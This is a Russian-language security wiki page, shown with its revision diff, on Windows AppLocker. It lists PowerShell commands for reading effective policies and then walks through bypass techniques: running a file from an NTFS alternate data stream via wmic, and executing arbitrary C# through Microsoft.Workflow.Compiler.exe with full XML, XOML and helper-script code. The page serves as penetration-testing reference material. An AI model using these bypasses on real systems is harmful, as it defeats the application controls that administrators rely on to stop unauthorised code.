Applocker — различия между версиями

Материал из InformationSecurity WIKI
Перейти к: навигация, поиск
(Новая страница: «Applocker - функция управления приложениями и политиками по запуску программного обеспечени…»)
 
м
Строка 38: Строка 38:
  
 
** APPX
 
** APPX
 +
 +
= Общее =
 +
 +
== Получение политики (все юзеры) ==
 +
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
Get-ApplockerPolicy -effective
 +
</syntaxhighlight>
 +
 +
== Получение политики (все группы текущего пользователя) ==
 +
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
$a = Get-ApplockerPolicy -effective
 +

 +
$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
 +
$g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
 +
 +
Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
 +
$f = 0;
 +
$v = $y.UserOrGroupSid.value;
 +
Foreach ($z in $g){
 +
if (($z.Value -eq $u) -or ($z.Value -eq $v)){
 +
$f= 1;
 +
};
 +
};
 +
  if ($f -eq 1){
 +
Write-Output $y.PathConditions;
 +
Write-Output $y.Action;
 +
}
 +
}}
 +
</syntaxhighlight>
 +
 +
Однострочник
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
$a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};
 +
</syntaxhighlight>
 +
 +
= Обход AppLocker =
 +
 +
== Альтернативный канал ==
 +
 +
Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его:
 +
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
type test.exe > C:\logs:test.exe
 +
wmic process call create '"C:\logs:test.exe"'
 +
</syntaxhighlight>
 +
 +
== Интерпретаторы ==
 +
 +
* python
 +
 +
* perl
 +
 +
* java
 +
 +
И так далее
 +
 +
== Макросы ворда ==
 +
 +
Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.
 +
 +
== Небезопасные политики ==
 +
 +
Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.
 +
 +
 +
== InstallUtil ==
 +
 +
См. [amsi]
 +
 +
== Microsoft.Workflow.Compiler.exe ==
 +
 +
 +
test.xml:
 +
<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll; height: 300px" >
 +
<?xml version="1.0" encoding="utf-8"?>
 +
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
 +
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
 +
<d2p1:string>test.xoml</d2p1:string>
 +
</files>
 +
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
 +
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
 +
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
 +
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
 +
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
 +
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
 +
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
 +
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
 +
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<d2p1:checkTypes>false</d2p1:checkTypes>
 +
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
 +
<d2p1:compilerOptions i:nil="true" />
 +
<d2p1:generateCCU>false</d2p1:generateCCU>
 +
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
 +
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
 +
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
 +
<d2p1:mtInfo i:nil="true" />
 +
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
 +
</parameters>
 +
</CompilerInput>
 +
</syntaxhighlight>
 +
 +
 +
text.xoml:
 +
<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
 +
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
 +
    <CodeActivity x:Name="codeActivity1" />
 +
    <x:Code><![CDATA[
 +
    public class Foo : SequentialWorkflowActivity {
 +
    public Foo() {
 +
            Console.WriteLine("FOOO!!!!");
 +
        }
 +
    }
 +
    ]]></x:Code>
 +
</SequentialWorkflowActivity>
 +
</syntaxhighlight>
 +
 +
 +
Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его:
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml
 +
</syntaxhighlight>
 +
 +
Полный фрагмент кода для автоматизации запуска:
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll;height:300px;" >
 +
function New-CompilerInputXml {
 +
<#
 +
.SYNOPSIS
 +
Creates a an XML file consisting of a serialized CompilerInput object.
 +
.DESCRIPTION
 +
New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
 +
.PARAMETER XOMLPath
 +
Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
 +
.PARAMETER OutputPath
 +
Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
 +
.EXAMPLE
 +
New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
 +
Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
 +
.EXAMPLE
 +
New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
 +
Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
 +
.OUTPUTS
 +
System.IO.FileInfo
 +
Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
 +
#>
 +
 +
    [OutputType([System.IO.FileInfo])]
 +
    param (
 +
        [String]
 +
        [ValidateNotNullOrEmpty()]
 +
        $XOMLPath = 'test.xoml',
 +
 +
        [Parameter(Mandatory = $True)]
 +
        [String]
 +
        [ValidateNotNullOrEmpty()]
 +
        $OutputPath
 +
    )
 +
 +
    # This assembly won't be loaded by default. We need to load
 +
    # it in order to get access to the WorkflowCompilerParameters class.
 +
    Add-Type -AssemblyName 'System.Workflow.ComponentModel'
 +
 +
    # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
 +
    $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
 +
 +
    # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
 +
    $WFCompilerParams.GenerateInMemory = $True
 +
 +
    # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
 +
    $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
 +
 +
    # Load the assembly
 +
    $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
 +
 +
    # This is the helper method that will serialize the CompilerInput object to disk
 +
    $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
 +
 +
    $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
 +
 +
    Move-Item $TempFile $OutputPath -PassThru
 +
}
 +
</syntaxhighlight>
 +
 +
Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
 +
 +
 +
= Ссылки =

Версия 14:50, 16 марта 2022

Applocker - функция управления приложениями и политиками по запуску программного обеспечения в Windows.

Позволяет управлять:

  • Исполняемые файлы
    • EXE
    • COM
  • Скрипты
    • JS
    • PS1
    • VBS
    • CMD
    • BAT
  • Установочные файлы
    • MST
    • MSI
    • MSP
  • Библиотеки
    • DLL
    • OCX
  • Упакованные приложения
    • APPX

Общее

Получение политики (все юзеры)

1 Get-ApplockerPolicy -effective

Получение политики (все группы текущего пользователя)

 1 $a = Get-ApplockerPolicy -effective
 2 
 3 $u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
 4 $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
 5 
 6 Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
 7 $f = 0;
 8 $v = $y.UserOrGroupSid.value; 
 9 Foreach ($z in $g){
10 if (($z.Value -eq $u) -or ($z.Value -eq $v)){
11 $f= 1;
12 };
13 };
14   if ($f -eq 1){
15 Write-Output $y.PathConditions;
16 Write-Output $y.Action;
17 }
18 }}

Однострочник 

1 $a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};

Обход AppLocker

Альтернативный канал

Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его: 

1 type test.exe > C:\logs:test.exe
2 wmic process call create '"C:\logs:test.exe"'

Интерпретаторы

  • python
  • perl
  • java

И так далее

Макросы ворда

Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.

Небезопасные политики

Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.


InstallUtil

См. [amsi]

Microsoft.Workflow.Compiler.exe

test.xml: 

 1 <?xml version="1.0" encoding="utf-8"?>
 2 <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
 3 <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
 4 <d2p1:string>test.xoml</d2p1:string>
 5 </files>
 6 <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
 7 <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 8 <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 9 <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
10 <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
11 <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
12 <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
13 <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
14 <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
15 <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
16 <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
17 <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
18 <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
19 <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
20 <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
21 <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
22 <d2p1:checkTypes>false</d2p1:checkTypes>
23 <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
24 <d2p1:compilerOptions i:nil="true" />
25 <d2p1:generateCCU>false</d2p1:generateCCU>
26 <d2p1:languageToUse>CSharp</d2p1:languageToUse>
27 <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
28 <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
29 <d2p1:mtInfo i:nil="true" />
30 <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
31 </parameters>
32 </CompilerInput>


text.xoml: 

 1 <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
 2     <CodeActivity x:Name="codeActivity1" />
 3     <x:Code><![CDATA[
 4     public class Foo : SequentialWorkflowActivity {
 5      public Foo() {
 6             Console.WriteLine("FOOO!!!!");
 7         }
 8     }
 9     ]]></x:Code>
10 </SequentialWorkflowActivity>


Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его: 

1 C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml

Полный фрагмент кода для автоматизации запуска: 

 1 function New-CompilerInputXml {
 2 <#
 3 .SYNOPSIS
 4 Creates a an XML file consisting of a serialized CompilerInput object.
 5 .DESCRIPTION
 6 New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
 7 .PARAMETER XOMLPath
 8 Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
 9 .PARAMETER OutputPath
10 Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
11 .EXAMPLE
12 New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
13 Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
14 .EXAMPLE
15 New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
16 Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
17 .OUTPUTS
18 System.IO.FileInfo
19 Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
20 #>
21 
22     [OutputType([System.IO.FileInfo])]
23     param (
24         [String]
25         [ValidateNotNullOrEmpty()]
26         $XOMLPath = 'test.xoml',
27 
28         [Parameter(Mandatory = $True)]
29         [String]
30         [ValidateNotNullOrEmpty()]
31         $OutputPath
32     )
33 
34     # This assembly won't be loaded by default. We need to load
35     # it in order to get access to the WorkflowCompilerParameters class.
36     Add-Type -AssemblyName 'System.Workflow.ComponentModel'
37 
38     # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
39     $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
40 
41     # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
42     $WFCompilerParams.GenerateInMemory = $True
43 
44     # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
45     $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
46 
47     # Load the assembly
48     $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
49 
50     # This is the helper method that will serialize the CompilerInput object to disk
51     $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
52 
53     $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
54 
55     Move-Item $TempFile $OutputPath -PassThru
56 }

Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb


Ссылки

Источник — «http://itsecwiki.org/index.php?title=Applocker&oldid=1038»